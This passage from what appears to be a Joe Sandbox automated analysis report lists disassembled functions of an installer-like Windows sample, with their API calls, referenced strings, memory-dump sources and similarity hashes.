                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                  • String ID: !N~
                                                                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                  Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                  Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                  Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4